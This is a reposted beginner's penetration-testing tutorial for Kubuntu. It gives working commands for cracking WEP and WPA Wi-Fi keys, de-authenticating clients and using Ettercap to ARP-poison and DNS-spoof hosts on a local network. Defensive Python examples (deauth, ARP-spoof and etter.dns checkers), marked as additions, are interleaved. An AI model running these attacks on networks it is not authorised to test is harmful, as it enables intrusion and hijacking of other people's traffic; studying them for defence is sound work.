Basic Penetration Testing: Kubuntu Style

Linux for the casual hacker

(Uploaded by nahumq2, posted on 14-Oct-2014)

Installing: Aircrack-ng, Ettercap, Kismet, MacChanger, Metasploit Framework, Nmap, Social Engineering Toolkit (SET), Wireshark

Basic Use: Kismet network sniffing; Aircrack-ng WEP and WPA cracking; Ettercap ARP poisoning / DNS spoofing

2010 Chris Griffith [email protected]

Version 1.1, February 25, 2010

Page 2: Basic Penetrartion Testing-Kubuntu Style

PENETRATION TESTING Step 1: Install Kubuntu .................................................................................................................................. 4

Step 2: Update apt-get .................................................................................................................................. 4

Update repository list ............................................................................................................................... 4

Upgrade current programs ....................................................................................................................... 4

Step 3: Install Basic Packages ........................................................................................................................ 4

Install Aircrack-ng.......................................................................................................................................... 5

Install Dependencies ................................................................................................................................. 5

Download Aircrack-ng ............................................................................................................................... 5

Download and Extract Dictionary ............................................................................................................. 5

Extract Aircrack-ng source files ................................................................................................................. 5

Install Aircrack-ng...................................................................................................................................... 5

Update Airodump-ng ................................................................................................................................ 5

Remove Install File .................................................................................................................................... 5

Install MacChanger ....................................................................................................................................... 6

Install Dependencies ................................................................................................................................. 6

Install MacChanger ................................................................................................................................... 6

Install Wireshark ........................................................................................................................................... 6

Install Kismet ................................................................................................................................................. 7

Install Dependencies ................................................................................................................................. 7

Download Kismet ...................................................................................................................................... 7

Extract Kismet source files ........................................................................................................................ 7

Run Configuration ..................................................................................................................................... 7

Install Kismet ............................................................................................................................................. 7

Remove Install File .................................................................................................................................... 8

Configure Kismet ....................................................................................................................................... 8

Install Metasploit .......................................................................................................................................... 9

Download Metasploit ............................................................................................................................... 9

Enable Execution ....................................................................................................................................... 9

Install Metasploit ...................................................................................................................................... 9

Remove Install File .................................................................................................................................... 9

Install SET .................................................................................................................................................... 10

Page 3: Basic Penetrartion Testing-Kubuntu Style

Install Dependencies ............................................................................................................................... 10

Download SET ......................................................................................................................................... 10

Run SET ................................................................................................................................................... 10

Install Nmap ................................................................................................................................................ 11

Download Nmap ..................................................................................................................................... 11

Extract Nmap Files .................................................................................................................................. 11

Configure Nmap ...................................................................................................................................... 11

Install Nmap ............................................................................................................................................ 11

Install Nmap GUI, Zenmap ...................................................................................................................... 11

Remove Install Files ................................................................................................................................ 12

Install Ettercap ............................................................................................................................................ 12

Install Dependencies ............................................................................................................................... 12

Install Ettercap ........................................................................................................................................ 12

Install Ettercap's gtk GUI ......................................................................................................................... 12

Running Kismet ........................................................................................................................................... 13

Running Aircrack-ng .................................................................................................................................... 18

Scanning Networks ................................................................................................................................. 18

WEP Attack .............................................................................................................................................. 19

WPA Attack ............................................................................................................................................. 21

DNS spoofing with Ettercap ........................................................................................................................ 25

Editing Where to Redirect Targets .......................................................................................................... 25

Sniffing Network Traffic .......................................................................................................................... 25

Poisoning Targets .................................................................................................................................... 27

Contact Info................................................................................................................................................. 29

Legal Notice and Disclaimer ........................................................................................................................ 29

Liability .................................................................................................................................................... 29

Legality .................................................................................................................................................... 29

STEP 1: INSTALL KUBUNTU

(Most of these commands also work on other flavors of Ubuntu.)

• Go to http://www.kubuntu.org/
• Download (free) or order a CD/DVD of Kubuntu
• Install Kubuntu. If you need help, there are plenty of community support sites online, such as linux.com, that will help you get started.

STEP 2: UPDATE APT-GET

Note: requires an internet connection.

apt-get is the program that you will be using to download most of the components. The first step is to update its repository list and see whether any installed programs need updating. To run these commands, start the terminal; it can be found under Applications >> System >> Terminal.

NOTICE: Each indented block below represents a single command, even if it wraps onto multiple rows!

UPDATE REPOSITORY LIST

    sudo apt-get -y update

UPGRADE CURRENT PROGRAMS

    sudo apt-get -y upgrade

STEP 3: INSTALL BASIC PACKAGES

These will make your life easier while installing packages and using Kubuntu.

    sudo apt-get -y install build-essential subversion libglut3-dev python-dev iw libssl-dev

Note: While installing, it is assumed that you are starting in your home directory. You can make sure you are in that directory before doing any installation by typing:

    cd ~

(cd is a shell built-in, so it is run without sudo; "sudo cd ~" fails with "command not found" and would not change your shell's directory even if it ran.)

INSTALL AIRCRACK-NG

Website: http://aircrack-ng.org/

Description: "Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools."

INSTALL DEPENDENCIES

    sudo apt-get -y install build-essential libssl-dev libsqlite3-0 iw rar unrar

DOWNLOAD AIRCRACK-NG

    wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz

DOWNLOAD AND EXTRACT DICTIONARY

    wget http://www.christophergriffith.net/downloads/Glist.rar

    unrar e Glist.rar

EXTRACT AIRCRACK-NG SOURCE FILES

    tar -zxvf aircrack-ng-1.0.tar.gz

INSTALL AIRCRACK-NG

    cd aircrack-ng-1.0

    make

    sudo make install

UPDATE AIRODUMP-NG

    sudo airodump-ng-oui-update

REMOVE INSTALL FILE

    cd ~

    sudo rm aircrack-ng-1.0.tar.gz

    sudo rm -r aircrack-ng-1.0

INSTALL MACCHANGER

Website: http://www.alobbs.com/macchanger

Description: "A GNU/Linux utility for viewing/manipulating the MAC address of network interfaces"

INSTALL DEPENDENCIES

    sudo apt-get -y install macchanger iproute-dev zenity

INSTALL MACCHANGER

    sudo apt-get -y install macchanger-gtk

INSTALL WIRESHARK

Website: http://www.wireshark.org

Description: "Wireshark is the world's foremost network protocol analyzer, and is the de facto (and often de jure) standard across many industries and educational institutions."

    sudo apt-get -y install wireshark

INSTALL KISMET

Website: http://www.kismetwireless.net/

Description: "Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT.

Kismet identifies networks by passively collecting packets and detecting standard named networks, detecting (and given time, de-cloaking) hidden networks, and inferring the presence of nonbeaconing networks via data traffic."

INSTALL DEPENDENCIES

    sudo apt-get -y install libruby libcurses-ruby libncurses5-dev libncurses5

    sudo apt-get -y install libpcap-dev libnl-dev libnl1

DOWNLOAD KISMET

    wget http://www.kismetwireless.net/code/kismet-2010-01-R1.tar.gz

EXTRACT KISMET SOURCE FILES

    tar -zxvf kismet-2010-01-R1.tar.gz

RUN CONFIGURATION

    cd kismet-2010-01-R1

    ./configure

Note: LOOK AT THE OUTPUT! It may say "LibNL/nl80211 support was not found." Check to make sure libnl is installed; the message may also appear simply because that support is not needed/used. If there are errors here, try to fix them, and then you will need to run ./configure again before "make dep".

INSTALL KISMET

    make dep

    sudo make install

Note: It will give the option to use "sudo make suidinstall", which means you do not have to run Kismet as root; however, in Kubuntu that is very temperamental and requires kismet_server to be started as root separately anyway. I would recommend just using "sudo make install" and running it as root.

REMOVE INSTALL FILE

    cd ~

    sudo rm kismet-2010-01-R1.tar.gz

    sudo rm -r kismet-2010-01-R1

CONFIGURE KISMET

You will also have to edit the configuration file before using Kismet. This is covered in the Running Kismet section below. You can edit the file by typing

    sudo kate /usr/local/etc/kismet.conf

INSTALL METASPLOIT

Metasploit is arguably the best open database of exploits.

Website: http://www.metasploit.com/

Description: "Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals."

DOWNLOAD METASPLOIT

    wget http://www.metasploit.com/releases/framework-3.3.3-linux-i686.run

ENABLE EXECUTION

    chmod +x framework-3.3.3-linux-i686.run

INSTALL METASPLOIT

    sudo ./framework-3.3.3-linux-i686.run

REMOVE INSTALL FILE

In case you hate cluttering up your home folder like I do, remove the install file with:

    sudo rm framework-3.3.3-linux-i686.run

INSTALL SET

The Social Engineering Toolkit: a very nice and easy way to run a multitude of different exploits, by exploiting the user with payloads from Metasploit.

Website: http://www.offensive-security.com/metasploit-unleashed/Social-Engineering-Toolkit

Description: "The Social-Engineering Toolkit (SET) was designed by David Kennedy (ReL1K) and incorporates many useful Social-Engineering attacks all in one simplistic interface. The main purpose of SET is to automate and improve on many of the social-engineering attacks out there. As pentesters, social-engineering is often a practice that not many people perform."

INSTALL DEPENDENCIES

NOTE: SET requires Metasploit; please install it before trying to run SET.

    sudo apt-get -y install subversion libglut3-dev python-dev iw ruby-full

DOWNLOAD SET

    svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/

RUN SET

SET does NOT require installation. To run SET, go to its directory and type "sudo ./set". In this scenario, the commands would look like:

    cd SET

    sudo ./set

INSTALL NMAP

Website: http://nmap.org/

Description: "Nmap ('Network Mapper') is a free and open source utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts."

Note: If you simply want to install Nmap and Zenmap and not worry about whether they are the latest version, just type:

    sudo apt-get -y install nmap

    sudo apt-get -y install zenmap

If you DO want the newest version, follow these steps:

DOWNLOAD NMAP

    wget http://nmap.org/dist/nmap-5.21.tar.bz2

EXTRACT NMAP FILES

    bzip2 -cd nmap-5.21.tar.bz2 | tar xvf -

CONFIGURE NMAP

    cd nmap-5.21

    ./configure

INSTALL NMAP

    make

    sudo make install

INSTALL NMAP GUI, ZENMAP

    sudo apt-get -y install zenmap

REMOVE INSTALL FILES

    cd ~

    sudo rm nmap-5.21.tar.bz2

    sudo rm -r nmap-5.21

(rmdir only removes empty directories, so the extracted source tree needs rm -r.)

INSTALL ETTERCAP

Website: http://ettercap.sourceforge.net/

Description: "Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis."

Note: Ettercap is fairly well supported by the Ubuntu team and you can usually find an up-to-date version in the repositories. This section just outlines which dependencies to get along with the GUI.

INSTALL DEPENDENCIES

    sudo apt-get -y install libnet6-1.3-dev libpcap-dev libpthread-stubs0-dev zlib-bin zlibc libtool libpcre3-dev libpcre-ocaml-dev openssl libssl0.9.8 libncurses5-dev libncurses5 ettercap-common libnet1

INSTALL ETTERCAP

    sudo apt-get -y install ettercap

INSTALL ETTERCAP'S GTK GUI

    sudo apt-get -f -y install ettercap-gtk

RUNNING KISMET

Kismet is a user-friendly program overall but needs some configuration before starting. Before starting Kismet, you need to edit the configuration file:

    sudo kate /usr/local/etc/kismet.conf

Note: If you are running Ubuntu, type gedit instead of kate.

Once you have kismet.conf open, find the line

    # logprefix=/some/path/to/logs

This is where you change where all of Kismet's log files are stored. I personally use

    /home/<myusername>/wifi/logs

(Change <myusername> to your user name for your home folder.) To add these directories to your home folder, before editing the line, open a terminal and type:

    sudo mkdir ~/wifi

    sudo mkdir ~/wifi/logs

The next thing you need to specify is which of your adapters to use for wireless sniffing. Find the lines

    # ncsource=interface:options
    # for example:
    # ncsource=wlan0
    # ncsource=wifi0:type=madwifi
    # ncsource=wlan0:name=intel,hop=false,channel=11

After all of these, add a line with your adapter. Most people would add

    ncsource=wlan0

NOTE: If you are unsure what adapter you have, go to a terminal and type

    ifconfig

This will display the network devices it finds. Then choose a wireless card, generally indicated by a name starting with wlan or wifi.

The last thing you will want to change is where it says:

    # Do we have a GPS?
    gps=true

If you don't have a GPS unit hooked up to your computer, change it to

    gps=false

You can now run Kismet by opening a terminal and typing

    sudo kismet

On opening, if configured correctly, it should ask whether you want to start the Kismet server. Select yes.
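The three kismet.conf edits above (logprefix, ncsource, gps) follow one pattern: the shipped file carries commented-out placeholders, and you either uncomment a key or add an active line after the placeholders. As an added example that is not part of the original guide, the helper below applies those edits to the configuration text idempotently, so running it twice does not duplicate lines. The kismet.conf excerpt is a constructed sample based on the lines quoted above, and the function names are this example's own.

```python
"""Apply the guide's three kismet.conf edits to a config text (added example)."""
import re

# Constructed sample of the relevant kismet.conf lines, not a real file dump.
SAMPLE_CONF = """\
# Kismet config (constructed sample)
# logprefix=/some/path/to/logs
# ncsource=interface:options
# for example:
# ncsource=wlan0
# ncsource=wifi0:type=madwifi
# ncsource=wlan0:name=intel,hop=false,channel=11
# Do we have a GPS?
gps=true
"""


def set_option(text, key, value):
    """Set `key=value` in the config text.

    An existing active assignment is replaced in place (idempotent). If only a
    commented-out `# key=...` placeholder exists, the new line goes right after
    the last such placeholder; otherwise it is appended at the end.
    """
    lines = text.splitlines()
    active = re.compile(r"^\s*%s\s*=" % re.escape(key))
    commented = re.compile(r"^\s*#\s*%s\s*=" % re.escape(key))
    new_line = "%s=%s" % (key, value)

    for i, line in enumerate(lines):
        if active.match(line):
            lines[i] = new_line
            return "\n".join(lines) + "\n"

    last_placeholder = max(
        (i for i, line in enumerate(lines) if commented.match(line)), default=None
    )
    if last_placeholder is None:
        lines.append(new_line)
    else:
        lines.insert(last_placeholder + 1, new_line)
    return "\n".join(lines) + "\n"


def configure_kismet(text, logprefix, interface, gps=False):
    """Perform the three edits described in the guide and return the new text."""
    text = set_option(text, "logprefix", logprefix)
    text = set_option(text, "ncsource", interface)
    text = set_option(text, "gps", "true" if gps else "false")
    return text


def get_option(text, key):
    """Return the active (uncommented) value of `key`, or None if unset."""
    match = re.search(r"^\s*%s\s*=\s*(.*?)\s*$" % re.escape(key), text, re.M)
    return match.group(1) if match else None


if __name__ == "__main__":
    # Hypothetical user path; substitute your own home directory.
    print(configure_kismet(SAMPLE_CONF, "/home/user/wifi/logs", "wlan0"))
```

To apply this to the real file, read /usr/local/etc/kismet.conf as root, pass its contents through configure_kismet, and write the result back; keeping a copy of the original first is cheap insurance.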

It will then give you options about the Kismet server. You don't have to change anything here; click Start.

The terminal will now show what is running in the server. This isn't overly exciting; it will simply tell you if anything is going wrong. Close that window to get back to Kismet by going to the bottom right-hand corner.

You should now see the main page of Kismet. From here you can see all the wireless networks it has picked up, the general packet rate, and how much data is being transferred. You can also select an individual network to find out more about it. However, before being able to select a network you have to sort them. I generally like to sort by which network has the most packet traffic. You can do this by going to the top menu, Sort >> Packets (descending), or by hitting Alt+S then Shift+P.

You can now select a network, which will display general information about it. Click it or hit Enter to see more details. To get back to the regular view, go to Network >> Close Window, or Alt+N then W.

Another handy view is Windows >> Channel View, or Alt+W then C. It shows which channels have the most traffic, the packet rate, and general signal strength.

That is the basic usage of Kismet. If you are interested in knowing more, you can find a lot more usage details on forums and community sites.

RUNNING AIRCRACK-NG

Aircrack is the premier network cracking program. There are a few steps that will make it much easier to crack a network. I will outline the basics of scanning for a network to attack and how to attack it, whether it is WEP or WPA.

SCANNING NETWORKS

First you want to put your wireless card in monitor mode. Do this by typing

    sudo airmon-ng start <wireless interface>

For me this looks like:

    sudo airmon-ng start wlan1

We then start scanning the different networks with the interface in monitor mode (airmon-ng prints the name of the monitor interface it created; mon0 in the commands below):

    sudo airodump-ng mon0

The first type of attack we are going to run is against a network running WEP encryption.

WEP ATTACK

Once you find a suitable target, you need to start capturing IVs. Do this by specifying the network channel and that you only want to log IVs:

    sudo airodump-ng --channel <channel number> -w <cap file> --ivs mon0

For my network, my command looks like:

    sudo airodump-ng --channel 8 -w wifi/caps/WEP --ivs mon0

Once you have collected a LOT of IVs (which you can see under the "#Data" column; a few thousand at least), start up aircrack-ng on the file you have created. Notice that it will now be a .ivs file. It also has a number appended, so the first time you write to that file name it would be WEP-01.ivs.

The command would look like:

    sudo aircrack-ng -a 1 <cap file>

My command is:

    sudo aircrack-ng -a 1 wifi/caps/WEP-01.ivs

Select the network you want to attack.

If it finds the key, you can now use it to connect to the network. If not, it will probably ask you to capture more IVs and try again.

WPA ATTACK

WPA attacks require a device that supports packet injection; this allows you to de-authenticate clients so they have to reconnect, which lets you capture their handshake. You will also need a dictionary of words for the dictionary attack. You can download them online in multiple places; I compiled a small collection of very large dictionaries that you can download using the Glist.rar wget command given in the Download and Extract Dictionary step of the Aircrack-ng installation.

When you see a network that you are interested in, you want to refine your network search and start logging the output:

    sudo airodump-ng --channel <channel number> -w <cap file> mon0

The network I am going after is called Rogue Network, which is on channel 1, so my command looks like

    sudo airodump-ng --channel 1 -w wifi/caps/WPA mon0

While scanning the networks, you will notice, underneath, the different devices that are connected to the networks. This attack is much more powerful if you have someone in particular to de-authenticate.

Note: Make sure you are still running airodump-ng in another terminal. You will need to capture the WPA handshake as soon as the clients try to re-authenticate.

You can try to de-authenticate everyone and see if everyone reconnects:

    sudo aireplay-ng --deauth <number of deauths to send> -a <target bssid> mon0

Or you can specify a particular client to attack by adding its MAC address after -c:

    sudo aireplay-ng --deauth <number of deauths to send> -a <target bssid> -c <client MAC> mon0

My example looks like:

    sudo aireplay-ng --deauth 5 -a 00:14:D1:C3:C9:88 -c 00:16:EA:72:58:BA mon0
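The de-authentication burst above is also the signature a wireless IDS (Kismet includes such alerts) keys on: a single deauth frame is routine, a cluster of them aimed at one BSSID within a few seconds is not. As an added, defender-side example that is not part of the original guide, the detector below counts deauth frames per BSSID in a sliding time window. The frame records are constructed; the subtype labels, the 5-second window and the threshold of 4 are this example's own assumptions, not values from the guide or from Kismet.

```python
"""Sliding-window detector for deauthentication floods (added example)."""
from collections import deque

# Constructed sample of 802.11 management-frame metadata:
# (time in seconds, frame subtype, BSSID, destination MAC).
# The five frames at t=10.0..11.6 mimic the "--deauth 5" burst above.
FRAMES = [
    (0.0, "beacon", "00:14:D1:C3:C9:88", "FF:FF:FF:FF:FF:FF"),
    (1.5, "deauth", "00:14:D1:C3:C9:88", "00:16:EA:72:58:BA"),   # a lone deauth is normal
    (10.0, "deauth", "00:14:D1:C3:C9:88", "00:16:EA:72:58:BA"),
    (10.4, "deauth", "00:14:D1:C3:C9:88", "00:16:EA:72:58:BA"),
    (10.8, "deauth", "00:14:D1:C3:C9:88", "00:16:EA:72:58:BA"),
    (11.2, "deauth", "00:14:D1:C3:C9:88", "00:16:EA:72:58:BA"),
    (11.6, "deauth", "00:14:D1:C3:C9:88", "00:16:EA:72:58:BA"),
    (12.0, "data", "00:14:D1:C3:C9:88", "00:16:EA:72:58:BA"),
    (30.0, "deauth", "AA:BB:CC:DD:EE:01", "FF:FF:FF:FF:FF:FF"),  # other AP, single frame
]


def detect_deauth_floods(frames, window=5.0, threshold=4):
    """Return one alert per BSSID whose deauth count within any `window`
    seconds reaches `threshold`. Each alert is (window_start, bssid, count).
    """
    recent = {}        # bssid -> deque of deauth timestamps inside the window
    alerted = set()    # BSSIDs already reported, to avoid one alert per frame
    alerts = []
    for ts, subtype, bssid, _dst in sorted(frames):
        if subtype != "deauth":
            continue
        q = recent.setdefault(bssid, deque())
        q.append(ts)
        # Evict timestamps that have fallen out of the sliding window.
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerts.append((q[0], bssid, len(q)))
            alerted.add(bssid)
    return alerts


if __name__ == "__main__":
    for start, bssid, count in detect_deauth_floods(FRAMES):
        print("deauth flood against %s: %d frames starting at t=%.1f" % (bssid, count, start))
```

Detection is the fallback; the mitigation is 802.11w Protected Management Frames, which authenticates deauthentication and disassociation frames so a station discards forged ones (WPA3 makes it mandatory). A monitor like this still matters for networks that cannot enable it.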

Now switch over to the airodump-ng tab and, in the upper right-hand corner, see if it says "WPA Handshake".

If you were able to capture one, you can move on to dictionary-attacking it. If you were unable to capture a handshake, make sure you are attacking a WPA network with aireplay-ng and that there are clients connected to it.

The next step requires a dictionary file, to try to crack it using a list of common words and passwords:

    sudo aircrack-ng -a 2 -w <dictionary file> <caps file>

My command will look like this:

    sudo aircrack-ng -a 2 -w Glist.txt wifi/caps/WPA-01.cap

It will start testing against your word list and hopefully find the key.

DNS SPOOFING WITH ETTERCAP

EDITING WHERE TO REDIRECT TARGETS

The first step is to decide where to redirect the target; you do this by editing the file etter.dns:

    sudo kate /usr/share/ettercap/etter.dns

At the end of the file, you can type the domain you want to redirect and the IP to redirect it to. To simply redirect someone, type the domain, then A, then the IP to redirect to.

For example, to redirect traffic from Google to Bing, type

    google.com A 64.4.8.147
    *.google.com A 64.4.8.147

The second line includes a wildcard, so any subdomain of google.com will also be redirected (including when they type www before it). You can find the IP address of the site you want to redirect to by going to the terminal and typing:

    host <website url>

This will display a list of IPs tied to that domain; the main one will be the first line displayed.

Save and close the file, and now start up Ettercap as root:

    sudo ettercap -G

Note: if you are having problems with Ettercap in GTK mode, try running it directly in the terminal with curses. Do this by typing "sudo ettercap -C".

Now that you have your shiny front end, you first want to start sniffing the traffic of the network you are connected to. Remember, Ettercap only works when you are connected to a network, while Aircrack-ng and Kismet work better without being connected to one.

SNIFFING NETWORK TRAFFIC

The next step is to start sniffing the traffic and all the hosts on your network. Start "Unified sniffing..." under the "Sniff" menu item (Sniff >> Unified sniffing...), or hit Shift+U.
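The etter.dns format above (name, record type, value; `*` as a wildcard) is simple enough to parse, and doing so is useful on the defensive side: given an etter.dns recovered from a compromised host, you can list exactly which names its answers would have hijacked. The parser below is an added example, not ettercap's own code; the sample file is constructed (its two google.com lines mirror the guide), and treating `*` as a glob-style wildcard is this example's assumption about ettercap's matching rules.

```python
"""Parse etter.dns-style records and find which names they redirect (added example)."""
import fnmatch
import ipaddress

# Constructed sample etter.dns; the malformed line shows the parser's leniency.
SAMPLE_ETTER_DNS = """\
# constructed sample etter.dns
google.com       A   64.4.8.147
*.google.com     A   64.4.8.147
mail.example.com A   10.0.0.5
example.com      PTR 10.0.0.5   # kept as a record, but not used for A lookups
not a valid line
"""


def parse_etter_dns(text):
    """Return a list of (pattern, rtype, value) for well-formed records."""
    records = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and whitespace
        if not line:
            continue
        parts = line.split()
        if len(parts) != 3:
            continue                           # malformed line: skip it
        name, rtype, value = parts
        if rtype.upper() == "A":
            try:
                ipaddress.ip_address(value)    # an A record needs a valid IP
            except ValueError:
                continue
        records.append((name.lower(), rtype.upper(), value))
    return records


def lookup(records, qname):
    """Return the spoofed IP an A query for `qname` would get, or None.

    Exact names take precedence over wildcard patterns; within each group the
    first matching record wins. Matching is case-insensitive.
    """
    qname = qname.lower().rstrip(".")
    a_records = [r for r in records if r[1] == "A"]
    for pattern, _, value in a_records:
        if "*" not in pattern and "?" not in pattern and pattern == qname:
            return value
    for pattern, _, value in a_records:
        if fnmatch.fnmatchcase(qname, pattern):   # assumption: glob-style wildcards
            return value
    return None


def affected_names(records, queries):
    """Map each queried name that would be redirected to its spoofed answer."""
    result = {}
    for q in queries:
        ip = lookup(records, q)
        if ip is not None:
            result[q] = ip
    return result


if __name__ == "__main__":
    recs = parse_etter_dns(SAMPLE_ETTER_DNS)
    print(affected_names(recs, ["google.com", "www.google.com", "bing.com"]))
```

Note what the exact-versus-wildcard rule implies: with only the `google.com` line present, `www.google.com` is untouched, which is why the guide adds the second line. A defender checking a suspect resolver can run the same comparison the other way round: resolve a handful of names through the network and through a known-good path, and treat any answer that differs as a candidate spoof.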

This will bring up a drop-down box of interfaces to sniff on. Select the one on which you are connected to the network. After selecting this and hitting OK, you will notice a larger selection of menu items.

Running in curses: you will need to type the name of the adapter in instead.

You now want to scan all the hosts on your network to select your targets. Do this by going to Hosts >> Scan for hosts, or Ctrl+S. Once the scan is complete, press H to see the hosts it picked up, or go to Hosts >> Hosts list.

Now you need to select whom you want to poison. You are going to be the "man in the middle" and are choosing which connections to sit between. To successfully spoof the DNS of the target computers, you must know the device that they are connected to. You can usually tell by its IP standing apart from the others on the list; most home routers will be in the 192.168.0.1 - 192.168.1.10 range. The one you see in the examples is 192.168.1.1. Select it and click "Add to Target 1", then select all the other devices, or a specific one you want to poison, and add it to Target 2.

Running in curses: you will have to add the targets manually. You can do this by hitting Ctrl+T or going to Targets >> Select TARGET(s). Then enter the IPs of the targets between the slashes; so either /192.168.1.1/ would work, or /192.168.1.1-255/ if you want a range.

Note: You can check to make sure you specified the right targets by hitting T or going to Targets >> Current Targets.

POISONING TARGETS

Now you need to poison the targets' ARP caches. Go to Mitm >> Arp poisoning... A popup will appear; you don't need any optional parameters, so just accept and go on. Now hit Ctrl+W to start sniffing, or go to Start >> Start sniffing...
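What ARP poisoning does to the hosts in Target 1 and Target 2 is visible in their ARP traffic: the router's IP suddenly answers from a different MAC, and one MAC starts claiming several IPs. As an added, defender-side example that is not part of the original guide, the monitor below keeps the IP-to-MAC history that tools such as arpwatch maintain and raises both kinds of alert. The ARP reply records are constructed (192.168.1.1 is the router address used in the guide's example; the MACs are sample values), and the alert format is this example's own.

```python
"""Detect ARP cache poisoning from observed ARP replies (added example)."""

# Constructed sample ARP replies: (time in seconds, sender IP, sender MAC).
# From t=60 a third MAC answers for both the router and a client.
ARP_REPLIES = [
    (0, "192.168.1.1", "00:14:D1:C3:C9:88"),     # router, real MAC
    (5, "192.168.1.20", "00:16:EA:72:58:BA"),    # a client
    (9, "192.168.1.1", "00:14:D1:C3:C9:88"),
    (60, "192.168.1.1", "DE:AD:BE:EF:00:01"),    # router IP now claimed by another MAC
    (61, "192.168.1.20", "DE:AD:BE:EF:00:01"),   # same MAC also claims the client IP
    (62, "192.168.1.1", "DE:AD:BE:EF:00:01"),
]


def detect_arp_spoofing(replies, gateway_ip):
    """Return (gateway_alerts, multi_ip_alerts).

    gateway_alerts: list of (time, old_mac, new_mac) for every MAC change on
                    the gateway IP, the classic sign of a poisoned gateway entry.
    multi_ip_alerts: dict mac -> sorted IPs for any MAC that answered for more
                     than one IP, which is what an ARP-poisoning host does.
    MACs are normalised to lower case so formatting differences do not hide a match.
    """
    ip_to_mac = {}
    mac_to_ips = {}
    gateway_alerts = []
    for ts, ip, mac in sorted(replies):
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if ip == gateway_ip and previous is not None and previous != mac:
            gateway_alerts.append((ts, previous, mac))
        ip_to_mac[ip] = mac
        mac_to_ips.setdefault(mac, set()).add(ip)
    multi_ip_alerts = {
        mac: sorted(ips) for mac, ips in mac_to_ips.items() if len(ips) > 1
    }
    return gateway_alerts, multi_ip_alerts


if __name__ == "__main__":
    changes, multi = detect_arp_spoofing(ARP_REPLIES, "192.168.1.1")
    for ts, old, new in changes:
        print("t=%d: gateway MAC changed %s -> %s" % (ts, old, new))
    for mac, ips in multi.items():
        print("%s answers for several IPs: %s" % (mac, ", ".join(ips)))
```

The same history is the basis for the usual countermeasures: a static ARP entry for the gateway on hosts that matter, and Dynamic ARP Inspection on managed switches, which drops replies that disagree with the DHCP snooping table. A legitimate router replacement also shows up as a gateway MAC change, so the first alert type needs a human to confirm it.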

Finally, enable the DNS spoofing plugin by hitting Ctrl+P (Plugins >> Manage the plugins) and selecting "dns_spoof".

In the console underneath you should now see the message "Activating dns_spoof plugin..."

Then lean back and laugh as you see your plugin working; it will display a line each time someone tries to go to a spoofed site: "dns_spoof: [<original url>] spoofed to [<new ip>]"

CONTACT INFO

I hope you have found this information useful and accurate.

If you find anything incorrect or confusing, or simply want to send a message, please feel free to contact me.

[email protected]

LEGAL NOTICE AND DISCLAIMER

LIABILITY

1. You are the only one liable if you use this information in an illegal or unethical manner. I hold no responsibility for your actions with this knowledge. I hope you find it useful to test on your own network and learn how to tighten your own security.

LEGALITY

2. It is ILLEGAL to use many of these programs on networks you don't own. Make sure you are abiding by all laws while using these programs.